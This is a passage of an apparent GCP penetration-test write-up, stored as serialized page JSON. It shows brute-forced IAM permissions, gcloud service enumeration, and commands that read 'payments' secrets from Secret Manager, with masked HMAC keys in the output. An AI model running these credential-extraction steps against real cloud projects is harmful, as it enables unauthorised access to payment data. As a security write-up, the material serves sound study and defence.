resourcemanager.projects=get\n",{"type":33,"tag":128,"props":3433,"children":3434},{"class":130,"line":1051},[3435,3439,3443,3447,3451,3455],{"type":33,"tag":128,"props":3436,"children":3437},{"style":135},[3438],{"type":38,"value":520},{"type":33,"tag":128,"props":3440,"children":3441},{"style":523},[3442],{"type":38,"value":526},{"type":33,"tag":128,"props":3444,"children":3445},{"style":140},[3446],{"type":38,"value":3418},{"type":33,"tag":128,"props":3448,"children":3449},{"style":140},[3450],{"type":38,"value":577},{"type":33,"tag":128,"props":3452,"children":3453},{"style":140},[3454],{"type":38,"value":541},{"type":33,"tag":128,"props":3456,"children":3457},{"style":140},[3458],{"type":38,"value":3459}," secretmanager.secrets=get\n",{"type":33,"tag":128,"props":3461,"children":3462},{"class":130,"line":1063},[3463,3467,3471,3475,3479,3483],{"type":33,"tag":128,"props":3464,"children":3465},{"style":135},[3466],{"type":38,"value":520},{"type":33,"tag":128,"props":3468,"children":3469},{"style":523},[3470],{"type":38,"value":526},{"type":33,"tag":128,"props":3472,"children":3473},{"style":140},[3474],{"type":38,"value":3418},{"type":33,"tag":128,"props":3476,"children":3477},{"style":140},[3478],{"type":38,"value":577},{"type":33,"tag":128,"props":3480,"children":3481},{"style":140},[3482],{"type":38,"value":541},{"type":33,"tag":128,"props":3484,"children":3485},{"style":140},[3486],{"type":38,"value":3487}," secretmanager.secrets=get-iam-policy\n",{"type":33,"tag":128,"props":3489,"children":3490},{"class":130,"line":1076},[3491,3495,3499,3503,3507,3511],{"type":33,"tag":128,"props":3492,"children":3493},{"style":135},[3494],{"type":38,"value":520},{"type":33,"tag":128,"props":3496,"children":3497},{"style":523},[3498],{"type":38,"value":526},{"type":33,"tag":128,"props":3500,"children":3501},{"style":140},[3502],{"type":38,"value":3418},{"type":33,"tag":128,"props":3504,"children":3505},{"style":140},[3506],{"type":38,"value":577},{"type":33,"tag":128,"props":3508,"children":3509},{"style":140},[3510],{"type":38,"value":541},{"type":33,"tag":128,"props":3512,"children":3513},{"style":140},[3514],{"type":38,"value":3515}," secretmanager.secrets=list\n",{"type":33,"tag":128,"props":3517,"children":3518},{"class":130,"line":1089},[3519,3523,3527,3532,3536,3540],{"type":33,"tag":128,"props":3520,"children":3521},{"style":135},[3522],{"type":38,"value":520},{"type":33,"tag":128,"props":3524,"children":3525},{"style":523},[3526],{"type":38,"value":526},{"type":33,"tag":128,"props":3528,"children":3529},{"style":140},[3530],{"type":38,"value":3531}," 00:38:57",{"type":33,"tag":128,"props":3533,"children":3534},{"style":140},[3535],{"type":38,"value":577},{"type":33,"tag":128,"props":3537,"children":3538},{"style":140},[3539],{"type":38,"value":541},{"type":33,"tag":128,"props":3541,"children":3542},{"style":140},[3543],{"type":38,"value":3544}," run.routes=invoke\n",{"type":33,"tag":128,"props":3546,"children":3547},{"class":130,"line":1101},[3548,3552,3556,3560,3564,3568],{"type":33,"tag":128,"props":3549,"children":3550},{"style":135},[3551],{"type":38,"value":520},{"type":33,"tag":128,"props":3553,"children":3554},{"style":523},[3555],{"type":38,"value":526},{"type":33,"tag":128,"props":3557,"children":3558},{"style":140},[3559],{"type":38,"value":3531},{"type":33,"tag":128,"props":3561,"children":3562},{"style":140},[3563],{"type":38,"value":577},{"type":33,"tag":128,"props":3565,"children":3566},{"style":140},[3567],{"type":38,"value":541},{"type":33,"tag":128,"props":3569,"children":3570},{"style":140},[3571],{"type":38,"value":3572}," serviceusage.quotas=get\n",{"type":33,"tag":128,"props":3574,"children":3575},{"class":130,"line":1114},[3576,3580,3584,3588,3592,3596],{"type":33,"tag":128,"props":3577,"children":3578},{"style":135},[3579],{"type":38,"value":520},{"type":33,"tag":128,"props":3581,"children":3582},{"style":523},[3583],{"type":38,"value":526},{"type":33,"tag":128,"props":3585,"children":3586},{"style":140},[3587],{"type":38,"value":3531},{"type":33,"tag":128,"props":3589,"children":3590},{"style":140},[3591],{"type":38,"value":577},{"type":33,"tag":128,"props":3593,"children":3594},{"style":140},[3595],{"type":38,"value":541},{"type":33,"tag":128,"props":3597,"children":3598},{"style":140},[3599],{"type":38,"value":3600}," serviceusage.services=get\n",{"type":33,"tag":128,"props":3602,"children":3603},{"class":130,"line":1127},[3604,3608,3612,3616,3620,3624],{"type":33,"tag":128,"props":3605,"children":3606},{"style":135},[3607],{"type":38,"value":520},{"type":33,"tag":128,"props":3609,"children":3610},{"style":523},[3611],{"type":38,"value":526},{"type":33,"tag":128,"props":3613,"children":3614},{"style":140},[3615],{"type":38,"value":3531},{"type":33,"tag":128,"props":3617,"children":3618},{"style":140},[3619],{"type":38,"value":577},{"type":33,"tag":128,"props":3621,"children":3622},{"style":140},[3623],{"type":38,"value":541},{"type":33,"tag":128,"props":3625,"children":3626},{"style":140},[3627],{"type":38,"value":3628}," serviceusage.services=list\n",{"type":33,"tag":47,"props":3630,"children":3631},{},[3632],{"type":38,"value":3633},"When we try to bruteforce the permissions of the new service account, we can see that many permissions are allocated to the compute service, but we can quickly see that it is not activated on the GCP organization.",{"type":33,"tag":114,"props":3635,"children":3636},{"lang":116},[3637],{"type":33,"tag":119,"props":3638,"children":3640},{"className":121,"code":3639,"language":116,"meta":8,"style":8},"$> gcloud compute networks list --project=$GCP_PROJ\nAPI [compute.googleapis.com] not enabled on project [gr-proj-4]. Would you like to enable and retry (this will take a few minutes)? (y/N)?\n\n$> gcloud services list\nNAME TITLE\nanalyticshub.googleapis.com Analytics Hub API\nbigquery.googleapis.com BigQuery API\nbigqueryconnection.googleapis.com BigQuery Connection API\nbigquerydatapolicy.googleapis.com BigQuery Data Policy API\nbigquerymigration.googleapis.com BigQuery Migration API\nbigqueryreservation.googleapis.com BigQuery Reservation API\nbigquerystorage.googleapis.com BigQuery Storage API\ncloudapis.googleapis.com Google Cloud APIs\ncloudresourcemanager.googleapis.com Cloud Resource Manager API\ncloudtrace.googleapis.com Cloud Trace API\ndataform.googleapis.com Dataform API\ndataplex.googleapis.com Cloud Dataplex API\ndatastore.googleapis.com Cloud Datastore API\niam.googleapis.com Identity and Access Management (IAM) API\niamcredentials.googleapis.com IAM Service Account Credentials API\nlogging.googleapis.com Cloud Logging API\nmonitoring.googleapis.com Cloud Monitoring API\nsecretmanager.googleapis.com Secret Manager API\nservicemanagement.googleapis.com Service Management API\nserviceusage.googleapis.com Service Usage API\nsql-component.googleapis.com Cloud SQL\nstorage-api.googleapis.com Google Cloud Storage JSON API\nstorage-component.googleapis.com Cloud Storage\nstorage.googleapis.com Cloud Storage API\n",[3641],{"type":33,"tag":105,"props":3642,"children":3643},{"__ignoreMap":8},[3644,3686,3774,3781,3806,3819,3842,3859,3881,3907,3929,3951,3973,3996,4023,4045,4062,4084,4106,4139,4171,4193,4214,4235,4256,4278,4296,4326,4344],{"type":33,"tag":128,"props":3645,"children":3646},{"class":130,"line":131},[3647,3652,3657,3661,3666,3671,3676,3681],{"type":33,"tag":128,"props":3648,"children":3649},{"style":135},[3650],{"type":38,"value":3651},"$",{"type":33,"tag":128,"props":3653,"children":3654},{"style":323},[3655],{"type":38,"value":3656},"> ",{"type":33,"tag":128,"props":3658,"children":3659},{"style":140},[3660],{"type":38,"value":110},{"type":33,"tag":128,"props":3662,"children":3663},{"style":140},[3664],{"type":38,"value":3665}," compute",{"type":33,"tag":128,"props":3667,"children":3668},{"style":140},[3669],{"type":38,"value":3670}," networks",{"type":33,"tag":128,"props":3672,"children":3673},{"style":140},[3674],{"type":38,"value":3675}," list",{"type":33,"tag":128,"props":3677,"children":3678},{"style":151},[3679],{"type":38,"value":3680}," --project=",{"type":33,"tag":128,"props":3682,"children":3683},{"style":140},[3684],{"type":38,"value":3685},"$GCP_PROJ\n",{"type":33,"tag":128,"props":3687,"children":3688},{"class":130,"line":362},[3689,3694,3699,3703,3708,3712,3717,3722,3727,3732,3737,3742,3747,3751,3756,3760,3765,3769],{"type":33,"tag":128,"props":3690,"children":3691},{"style":135},[3692],{"type":38,"value":3693},"API",{"type":33,"tag":128,"props":3695,"children":3696},{"style":323},[3697],{"type":38,"value":3698}," [compute.googleapis.com] not enabled on project ",{"type":33,"tag":128,"props":3700,"children":3701},{"style":312},[3702],{"type":38,"value":344},{"type":33,"tag":128,"props":3704,"children":3705},{"style":323},[3706],{"type":38,"value":3707},"gr-proj-4",{"type":33,"tag":128,"props":3709,"children":3710},{"style":312},[3711],{"type":38,"value":354},{"type":33,"tag":128,"props":3713,"children":3714},{"style":323},[3715],{"type":38,"value":3716},". Would you like to enable and retry (",{"type":33,"tag":128,"props":3718,"children":3719},{"style":135},[3720],{"type":38,"value":3721},"this",{"type":33,"tag":128,"props":3723,"children":3724},{"style":140},[3725],{"type":38,"value":3726}," will",{"type":33,"tag":128,"props":3728,"children":3729},{"style":140},[3730],{"type":38,"value":3731}," take",{"type":33,"tag":128,"props":3733,"children":3734},{"style":140},[3735],{"type":38,"value":3736}," a",{"type":33,"tag":128,"props":3738,"children":3739},{"style":140},[3740],{"type":38,"value":3741}," few",{"type":33,"tag":128,"props":3743,"children":3744},{"style":140},[3745],{"type":38,"value":3746}," minutes",{"type":33,"tag":128,"props":3748,"children":3749},{"style":323},[3750],{"type":38,"value":2966},{"type":33,"tag":128,"props":3752,"children":3753},{"style":300},[3754],{"type":38,"value":3755},"?",{"type":33,"tag":128,"props":3757,"children":3758},{"style":323},[3759],{"type":38,"value":2852},{"type":33,"tag":128,"props":3761,"children":3762},{"style":135},[3763],{"type":38,"value":3764},"y/N",{"type":33,"tag":128,"props":3766,"children":3767},{"style":323},[3768],{"type":38,"value":2966},{"type":33,"tag":128,"props":3770,"children":3771},{"style":300},[3772],{"type":38,"value":3773},"?\n",{"type":33,"tag":128,"props":3775,"children":3776},{"class":130,"line":403},[3777],{"type":33,"tag":128,"props":3778,"children":3779},{"emptyLinePlaceholder":896},[3780],{"type":38,"value":899},{"type":33,"tag":128,"props":3782,"children":3783},{"class":130,"line":739},[3784,3788,3792,3796,3801],{"type":33,"tag":128,"props":3785,"children":3786},{"style":135},[3787],{"type":38,"value":3651},{"type":33,"tag":128,"props":3789,"children":3790},{"style":323},[3791],{"type":38,"value":3656},{"type":33,"tag":128,"props":3793,"children":3794},{"style":140},[3795],{"type":38,"value":110},{"type":33,"tag":128,"props":3797,"children":3798},{"style":140},[3799],{"type":38,"value":3800}," services",{"type":33,"tag":128,"props":3802,"children":3803},{"style":140},[3804],{"type":38,"value":3805}," list\n",{"type":33,"tag":128,"props":3807,"children":3808},{"class":130,"line":765},[3809,3814],{"type":33,"tag":128,"props":3810,"children":3811},{"style":135},[3812],{"type":38,"value":3813},"NAME",{"type":33,"tag":128,"props":3815,"children":3816},{"style":140},[3817],{"type":38,"value":3818}," TITLE\n",{"type":33,"tag":128,"props":3820,"children":3821},{"class":130,"line":804},[3822,3827,3832,3837],{"type":33,"tag":128,"props":3823,"children":3824},{"style":135},[3825],{"type":38,"value":3826},"analyticshub.googleapis.com",{"type":33,"tag":128,"props":3828,"children":3829},{"style":140},[3830],{"type":38,"value":3831}," Analytics",{"type":33,"tag":128,"props":3833,"children":3834},{"style":140},[3835],{"type":38,"value":3836}," Hub",{"type":33,"tag":128,"props":3838,"children":3839},{"style":140},[3840],{"type":38,"value":3841}," API\n",{"type":33,"tag":128,"props":3843,"children":3844},{"class":130,"line":839},[3845,3850,3855],{"type":33,"tag":128,"props":3846,"children":3847},{"style":135},[3848],{"type":38,"value":3849},"bigquery.googleapis.com",{"type":33,"tag":128,"props":3851,"children":3852},{"style":140},[3853],{"type":38,"value":3854}," BigQuery",{"type":33,"tag":128,"props":3856,"children":3857},{"style":140},[3858],{"type":38,"value":3841},{"type":33,"tag":128,"props":3860,"children":3861},{"class":130,"line":848},[3862,3867,3872,3877],{"type":33,"tag":128,"props":3863,"children":3864},{"style":135},[3865],{"type":38,"value":3866},"bigqueryconnection.googleapis.com",{"type":33,"tag":128,"props":3868,"children":3869},{"style":140},[3870],{"type":38,"value":3871}," BigQuery",{"type":33,"tag":128,"props":3873,"children":3874},{"style":140},[3875],{"type":38,"value":3876}," Connection",{"type":33,"tag":128,"props":3878,"children":3879},{"style":140},[3880],{"type":38,"value":3841},{"type":33,"tag":128,"props":3882,"children":3883},{"class":130,"line":976},[3884,3889,3893,3898,3903],{"type":33,"tag":128,"props":3885,"children":3886},{"style":135},[3887],{"type":38,"value":3888},"bigquerydatapolicy.googleapis.com",{"type":33,"tag":128,"props":3890,"children":3891},{"style":140},[3892],{"type":38,"value":3871},{"type":33,"tag":128,"props":3894,"children":3895},{"style":140},[3896],{"type":38,"value":3897}," Data",{"type":33,"tag":128,"props":3899,"children":3900},{"style":140},[3901],{"type":38,"value":3902}," Policy",{"type":33,"tag":128,"props":3904,"children":3905},{"style":140},[3906],{"type":38,"value":3841},{"type":33,"tag":128,"props":3908,"children":3909},{"class":130,"line":988},[3910,3915,3920,3925],{"type":33,"tag":128,"props":3911,"children":3912},{"style":135},[3913],{"type":38,"value":3914},"bigquerymigration.googleapis.com",{"type":33,"tag":128,"props":3916,"children":3917},{"style":140},[3918],{"type":38,"value":3919}," BigQuery",{"type":33,"tag":128,"props":3921,"children":3922},{"style":140},[3923],{"type":38,"value":3924}," Migration",{"type":33,"tag":128,"props":3926,"children":3927},{"style":140},[3928],{"type":38,"value":3841},{"type":33,"tag":128,"props":3930,"children":3931},{"class":130,"line":1001},[3932,3937,3942,3947],{"type":33,"tag":128,"props":3933,"children":3934},{"style":135},[3935],{"type":38,"value":3936},"bigqueryreservation.googleapis.com",{"type":33,"tag":128,"props":3938,"children":3939},{"style":140},[3940],{"type":38,"value":3941}," BigQuery",{"type":33,"tag":128,"props":3943,"children":3944},{"style":140},[3945],{"type":38,"value":3946}," Reservation",{"type":33,"tag":128,"props":3948,"children":3949},{"style":140},[3950],{"type":38,"value":3841},{"type":33,"tag":128,"props":3952,"children":3953},{"class":130,"line":1014},[3954,3959,3964,3969],{"type":33,"tag":128,"props":3955,"children":3956},{"style":135},[3957],{"type":38,"value":3958},"bigquerystorage.googleapis.com",{"type":33,"tag":128,"props":3960,"children":3961},{"style":140},[3962],{"type":38,"value":3963}," BigQuery",{"type":33,"tag":128,"props":3965,"children":3966},{"style":140},[3967],{"type":38,"value":3968}," Storage",{"type":33,"tag":128,"props":3970,"children":3971},{"style":140},[3972],{"type":38,"value":3841},{"type":33,"tag":128,"props":3974,"children":3975},{"class":130,"line":1026},[3976,3981,3986,3991],{"type":33,"tag":128,"props":3977,"children":3978},{"style":135},[3979],{"type":38,"value":3980},"cloudapis.googleapis.com",{"type":33,"tag":128,"props":3982,"children":3983},{"style":140},[3984],{"type":38,"value":3985}," Google",{"type":33,"tag":128,"props":3987,"children":3988},{"style":140},[3989],{"type":38,"value":3990}," Cloud",{"type":33,"tag":128,"props":3992,"children":3993},{"style":140},[3994],{"type":38,"value":3995}," APIs\n",{"type":33,"tag":128,"props":3997,"children":3998},{"class":130,"line":1038},[3999,4004,4009,4014,4019],{"type":33,"tag":128,"props":4000,"children":4001},{"style":135},[4002],{"type":38,"value":4003},"cloudresourcemanager.googleapis.com",{"type":33,"tag":128,"props":4005,"children":4006},{"style":140},[4007],{"type":38,"value":4008}," Cloud",{"type":33,"tag":128,"props":4010,"children":4011},{"style":140},[4012],{"type":38,"value":4013}," Resource",{"type":33,"tag":128,"props":4015,"children":4016},{"style":140},[4017],{"type":38,"value":4018}," Manager",{"type":33,"tag":128,"props":4020,"children":4021},{"style":140},[4022],{"type":38,"value":3841},{"type":33,"tag":128,"props":4024,"children":4025},{"class":130,"line":1051},[4026,4031,4036,4041],{"type":33,"tag":128,"props":4027,"children":4028},{"style":135},[4029],{"type":38,"value":4030},"cloudtrace.googleapis.com",{"type":33,"tag":128,"props":4032,"children":4033},{"style":140},[4034],{"type":38,"value":4035}," Cloud",{"type":33,"tag":128,"props":4037,"children":4038},{"style":140},[4039],{"type":38,"value":4040}," Trace",{"type":33,"tag":128,"props":4042,"children":4043},{"style":140},[4044],{"type":38,"value":3841},{"type":33,"tag":128,"props":4046,"children":4047},{"class":130,"line":1063},[4048,4053,4058],{"type":33,"tag":128,"props":4049,"children":4050},{"style":135},[4051],{"type":38,"value":4052},"dataform.googleapis.com",{"type":33,"tag":128,"props":4054,"children":4055},{"style":140},[4056],{"type":38,"value":4057}," Dataform",{"type":33,"tag":128,"props":4059,"children":4060},{"style":140},[4061],{"type":38,"value":3841},{"type":33,"tag":128,"props":4063,"children":4064},{"class":130,"line":1076},[4065,4070,4075,4080],{"type":33,"tag":128,"props":4066,"children":4067},{"style":135},[4068],{"type":38,"value":4069},"dataplex.googleapis.com",{"type":33,"tag":128,"props":4071,"children":4072},{"style":140},[4073],{"type":38,"value":4074}," Cloud",{"type":33,"tag":128,"props":4076,"children":4077},{"style":140},[4078],{"type":38,"value":4079}," Dataplex",{"type":33,"tag":128,"props":4081,"children":4082},{"style":140},[4083],{"type":38,"value":3841},{"type":33,"tag":128,"props":4085,"children":4086},{"class":130,"line":1089},[4087,4092,4097,4102],{"type":33,"tag":128,"props":4088,"children":4089},{"style":135},[4090],{"type":38,"value":4091},"datastore.googleapis.com",{"type":33,"tag":128,"props":4093,"children":4094},{"style":140},[4095],{"type":38,"value":4096}," Cloud",{"type":33,"tag":128,"props":4098,"children":4099},{"style":140},[4100],{"type":38,"value":4101}," Datastore",{"type":33,"tag":128,"props":4103,"children":4104},{"style":140},[4105],{"type":38,"value":3841},{"type":33,"tag":128,"props":4107,"children":4108},{"class":130,"line":1101},[4109,4114,4119,4124,4129,4134],{"type":33,"tag":128,"props":4110,"children":4111},{"style":135},[4112],{"type":38,"value":4113},"iam.googleapis.com",{"type":33,"tag":128,"props":4115,"children":4116},{"style":140},[4117],{"type":38,"value":4118}," Identity",{"type":33,"tag":128,"props":4120,"children":4121},{"style":140},[4122],{"type":38,"value":4123}," and",{"type":33,"tag":128,"props":4125,"children":4126},{"style":140},[4127],{"type":38,"value":4128}," Access",{"type":33,"tag":128,"props":4130,"children":4131},{"style":140},[4132],{"type":38,"value":4133}," Management",{"type":33,"tag":128,"props":4135,"children":4136},{"style":323},[4137],{"type":38,"value":4138}," (IAM) API\n",{"type":33,"tag":128,"props":4140,"children":4141},{"class":130,"line":1114},[4142,4147,4152,4157,4162,4167],{"type":33,"tag":128,"props":4143,"children":4144},{"style":135},[4145],{"type":38,"value":4146},"iamcredentials.googleapis.com",{"type":33,"tag":128,"props":4148,"children":4149},{"style":140},[4150],{"type":38,"value":4151}," IAM",{"type":33,"tag":128,"props":4153,"children":4154},{"style":140},[4155],{"type":38,"value":4156}," Service",{"type":33,"tag":128,"props":4158,"children":4159},{"style":140},[4160],{"type":38,"value":4161}," Account",{"type":33,"tag":128,"props":4163,"children":4164},{"style":140},[4165],{"type":38,"value":4166}," Credentials",{"type":33,"tag":128,"props":4168,"children":4169},{"style":140},[4170],{"type":38,"value":3841},{"type":33,"tag":128,"props":4172,"children":4173},{"class":130,"line":1127},[4174,4179,4184,4189],{"type":33,"tag":128,"props":4175,"children":4176},{"style":135},[4177],{"type":38,"value":4178},"logging.googleapis.com",{"type":33,"tag":128,"props":4180,"children":4181},{"style":140},[4182],{"type":38,"value":4183}," Cloud",{"type":33,"tag":128,"props":4185,"children":4186},{"style":140},[4187],{"type":38,"value":4188}," Logging",{"type":33,"tag":128,"props":4190,"children":4191},{"style":140},[4192],{"type":38,"value":3841},{"type":33,"tag":128,"props":4194,"children":4195},{"class":130,"line":1139},[4196,4201,4205,4210],{"type":33,"tag":128,"props":4197,"children":4198},{"style":135},[4199],{"type":38,"value":4200},"monitoring.googleapis.com",{"type":33,"tag":128,"props":4202,"children":4203},{"style":140},[4204],{"type":38,"value":4035},{"type":33,"tag":128,"props":4206,"children":4207},{"style":140},[4208],{"type":38,"value":4209}," Monitoring",{"type":33,"tag":128,"props":4211,"children":4212},{"style":140},[4213],{"type":38,"value":3841},{"type":33,"tag":128,"props":4215,"children":4216},{"class":130,"line":1152},[4217,4222,4227,4231],{"type":33,"tag":128,"props":4218,"children":4219},{"style":135},[4220],{"type":38,"value":4221},"secretmanager.googleapis.com",{"type":33,"tag":128,"props":4223,"children":4224},{"style":140},[4225],{"type":38,"value":4226}," Secret",{"type":33,"tag":128,"props":4228,"children":4229},{"style":140},[4230],{"type":38,"value":4018},{"type":33,"tag":128,"props":4232,"children":4233},{"style":140},[4234],{"type":38,"value":3841},{"type":33,"tag":128,"props":4236,"children":4237},{"class":130,"line":1165},[4238,4243,4248,4252],{"type":33,"tag":128,"props":4239,"children":4240},{"style":135},[4241],{"type":38,"value":4242},"servicemanagement.googleapis.com",{"type":33,"tag":128,"props":4244,"children":4245},{"style":140},[4246],{"type":38,"value":4247}," Service",{"type":33,"tag":128,"props":4249,"children":4250},{"style":140},[4251],{"type":38,"value":4133},{"type":33,"tag":128,"props":4253,"children":4254},{"style":140},[4255],{"type":38,"value":3841},{"type":33,"tag":128,"props":4257,"children":4258},{"class":130,"line":1177},[4259,4264,4269,4274],{"type":33,"tag":128,"props":4260,"children":4261},{"style":135},[4262],{"type":38,"value":4263},"serviceusage.googleapis.com",{"type":33,"tag":128,"props":4265,"children":4266},{"style":140},[4267],{"type":38,"value":4268}," Service",{"type":33,"tag":128,"props":4270,"children":4271},{"style":140},[4272],{"type":38,"value":4273}," Usage",{"type":33,"tag":128,"props":4275,"children":4276},{"style":140},[4277],{"type":38,"value":3841},{"type":33,"tag":128,"props":4279,"children":4280},{"class":130,"line":1189},[4281,4286,4291],{"type":33,"tag":128,"props":4282,"children":4283},{"style":135},[4284],{"type":38,"value":4285},"sql-component.googleapis.com",{"type":33,"tag":128,"props":4287,"children":4288},{"style":140},[4289],{"type":38,"value":4290}," Cloud",{"type":33,"tag":128,"props":4292,"children":4293},{"style":140},[4294],{"type":38,"value":4295}," SQL\n",{"type":33,"tag":128,"props":4297,"children":4298},{"class":130,"line":1202},[4299,4304,4309,4313,4317,4322],{"type":33,"tag":128,"props":4300,"children":4301},{"style":135},[4302],{"type":38,"value":4303},"storage-api.googleapis.com",{"type":33,"tag":128,"props":4305,"children":4306},{"style":140},[4307],{"type":38,"value":4308}," Google",{"type":33,"tag":128,"props":4310,"children":4311},{"style":140},[4312],{"type":38,"value":3990},{"type":33,"tag":128,"props":4314,"children":4315},{"style":140},[4316],{"type":38,"value":3968},{"type":33,"tag":128,"props":4318,"children":4319},{"style":140},[4320],{"type":38,"value":4321}," JSON",{"type":33,"tag":128,"props":4323,"children":4324},{"style":140},[4325],{"type":38,"value":3841},{"type":33,"tag":128,"props":4327,"children":4328},{"class":130,"line":1214},[4329,4334,4339],{"type":33,"tag":128,"props":4330,"children":4331},{"style":135},[4332],{"type":38,"value":4333},"storage-component.googleapis.com",{"type":33,"tag":128,"props":4335,"children":4336},{"style":140},[4337],{"type":38,"value":4338}," Cloud",{"type":33,"tag":128,"props":4340,"children":4341},{"style":140},[4342],{"type":38,"value":4343}," Storage\n",{"type":33,"tag":128,"props":4345,"children":4346},{"class":130,"line":1226},[4347,4352,4356,4360],{"type":33,"tag":128,"props":4348,"children":4349},{"style":135},[4350],{"type":38,"value":4351},"storage.googleapis.com",{"type":33,"tag":128,"props":4353,"children":4354},{"style":140},[4355],{"type":38,"value":4183},{"type":33,"tag":128,"props":4357,"children":4358},{"style":140},[4359],{"type":38,"value":3968},{"type":33,"tag":128,"props":4361,"children":4362},{"style":140},[4363],{"type":38,"value":3841},{"type":33,"tag":47,"props":4365,"children":4366},{},[4367],{"type":38,"value":4368},"We can also see that we have rights on the secrets that we can enumerate with the following command:",{"type":33,"tag":114,"props":4370,"children":4371},{"lang":116},[4372],{"type":33,"tag":119,"props":4373,"children":4375},{"className":121,"code":4374,"language":116,"meta":8,"style":8},"$> gcloud secrets list --project=$GCP_PROJ\nNAME CREATED REPLICATION_POLICY LOCATIONS\npayments 2025-04-02T14:36:59 automatic -\npayments-storage 2025-04-02T16:25:57 automatic -\n\n$> gcloud secrets versions access latest --secret=payments-storage --project=$GCP_PROJ\ngr-stripe\n\n$> gcloud secrets versions access latest --secret=payments --project=$GCP_PROJ\nGOOG1E6CZ32****************************************\nHh**************************************\n",[4376],{"type":33,"tag":105,"props":4377,"children":4378},{"__ignoreMap":8},[4379,4411,4433,4456,4477,4484,4532,4540,4547,4591,4599],{"type":33,"tag":128,"props":4380,"children":4381},{"class":130,"line":131},[4382,4386,4390,4394,4399,4403,4407],{"type":33,"tag":128,"props":4383,"children":4384},{"style":135},[4385],{"type":38,"value":3651},{"type":33,"tag":128,"props":4387,"children":4388},{"style":323},[4389],{"type":38,"value":3656},{"type":33,"tag":128,"props":4391,"children":4392},{"style":140},[4393],{"type":38,"value":110},{"type":33,"tag":128,"props":4395,"children":4396},{"style":140},[4397],{"type":38,"value":4398}," secrets",{"type":33,"tag":128,"props":4400,"children":4401},{"style":140},[4402],{"type":38,"value":3675},{"type":33,"tag":128,"props":4404,"children":4405},{"style":151},[4406],{"type":38,"value":3680},{"type":33,"tag":128,"props":4408,"children":4409},{"style":140},[4410],{"type":38,"value":3685},{"type":33,"tag":128,"props":4412,"children":4413},{"class":130,"line":362},[4414,4418,4423,4428],{"type":33,"tag":128,"props":4415,"children":4416},{"style":135},[4417],{"type":38,"value":3813},{"type":33,"tag":128,"props":4419,"children":4420},{"style":140},[4421],{"type":38,"value":4422}," CREATED",{"type":33,"tag":128,"props":4424,"children":4425},{"style":140},[4426],{"type":38,"value":4427}," REPLICATION_POLICY",{"type":33,"tag":128,"props":4429,"children":4430},{"style":140},[4431],{"type":38,"value":4432}," LOCATIONS\n",{"type":33,"tag":128,"props":4434,"children":4435},{"class":130,"line":403},[4436,4441,4446,4451],{"type":33,"tag":128,"props":4437,"children":4438},{"style":135},[4439],{"type":38,"value":4440},"payments",{"type":33,"tag":128,"props":4442,"children":4443},{"style":140},[4444],{"type":38,"value":4445}," 2025-04-02T14:36:59",{"type":33,"tag":128,"props":4447,"children":4448},{"style":140},[4449],{"type":38,"value":4450}," automatic",{"type":33,"tag":128,"props":4452,"children":4453},{"style":140},[4454],{"type":38,"value":4455}," -\n",{"type":33,"tag":128,"props":4457,"children":4458},{"class":130,"line":739},[4459,4464,4469,4473],{"type":33,"tag":128,"props":4460,"children":4461},{"style":135},[4462],{"type":38,"value":4463},"payments-storage",{"type":33,"tag":128,"props":4465,"children":4466},{"style":140},[4467],{"type":38,"value":4468}," 2025-04-02T16:25:57",{"type":33,"tag":128,"props":4470,"children":4471},{"style":140},[4472],{"type":38,"value":4450},{"type":33,"tag":128,"props":4474,"children":4475},{"style":140},[4476],{"type":38,"value":4455},{"type":33,"tag":128,"props":4478,"children":4479},{"class":130,"line":765},[4480],{"type":33,"tag":128,"props":4481,"children":4482},{"emptyLinePlaceholder":896},[4483],{"type":38,"value":899},{"type":33,"tag":128,"props":4485,"children":4486},{"class":130,"line":804},[4487,4491,4495,4499,4503,4508,4513,4518,4523,4528],{"type":33,"tag":128,"props":4488,"children":4489},{"style":135},[4490],{"type":38,"value":3651},{"type":33,"tag":128,"props":4492,"children":4493},{"style":323},[4494],{"type":38,"value":3656},{"type":33,"tag":128,"props":4496,"children":4497},{"style":140},[4498],{"type":38,"value":110},{"type":33,"tag":128,"props":4500,"children":4501},{"style":140},[4502],{"type":38,"value":4398},{"type":33,"tag":128,"props":4504,"children":4505},{"style":140},[4506],{"type":38,"value":4507}," versions",{"type":33,"tag":128,"props":4509,"children":4510},{"style":140},[4511],{"type":38,"value":4512}," access",{"type":33,"tag":128,"props":4514,"children":4515},{"style":140},[4516],{"type":38,"value":4517}," latest",{"type":33,"tag":128,"props":4519,"children":4520},{"style":151},[4521],{"type":38,"value":4522}," --secret=payments-storage",{"type":33,"tag":128,"props":4524,"children":4525},{"style":151},[4526],{"type":38,"value":4527}," --project=",{"type":33,"tag":128,"props":4529,"children":4530},{"style":140},[4531],{"type":38,"value":3685},{"type":33,"tag":128,"props":4533,"children":4534},{"class":130,"line":839},[4535],{"type":33,"tag":128,"props":4536,"children":4537},{"style":135},[4538],{"type":38,"value":4539},"gr-stripe\n",{"type":33,"tag":128,"props":4541,"children":4542},{"class":130,"line":848},[4543],{"type":33,"tag":128,"props":4544,"children":4545},{"emptyLinePlaceholder":896},[4546],{"type":38,"value":899},{"type":33,"tag":128,"props":4548,"children":4549},{"class":130,"line":976},[4550,4554,4558,4562,4566,4570,4574,4578,4583,4587],{"type":33,"tag":128,"props":4551,"children":4552},{"style":135},[4553],{"type":38,"value":3651},{"type":33,"tag":128,"props":4555,"children":4556},{"style":323},[4557],{"type":38,"value":3656},{"type":33,"tag":128,"props":4559,"children":4560},{"style":140},[4561],{"type":38,"value":110},{"type":33,"tag":128,"props":4563,"children":4564},{"style":140},[4565],{"type":38,"value":4398},{"type":33,"tag":128,"props":4567,"children":4568},{"style":140},[4569],{"type":38,"value":4507},{"type":33,"tag":128,"props":4571,"children":4572},{"style":140},[4573],{"type":38,"value":4512},{"type":33,"tag":128,"props":4575,"children":4576},{"style":140},[4577],{"type":38,"value":4517},{"type":33,"tag":128,"props":4579,"children":4580},{"style":151},[4581],{"type":38,"value":4582}," --secret=payments",{"type":33,"tag":128,"props":4584,"children":4585},{"style":151},[4586],{"type":38,"value":4527},{"type":33,"tag":128,"props":4588,"children":4589},{"style":140},[4590],{"type":38,"value":3685},{"type":33,"tag":128,"props":4592,"children":4593},{"class":130,"line":988},[4594],{"type":33,"tag":128,"props":4595,"children":4596},{"style":135},[4597],{"type":38,"value":4598},"GOOG1E6CZ32****************************************\n",{"type":33,"tag":128,"props":4600,"children":4601},{"class":130,"line":1001},[4602],{"type":33,"tag":128,"props":4603,"children":4604},{"style":135},[4605],{"type":38,"value":4606},"Hh**************************************\n",{"type":33,"tag":47,"props":4608,"children":4609},{},[4610],{"type":38,"value":4611},"We can see that we have GCS keys. In 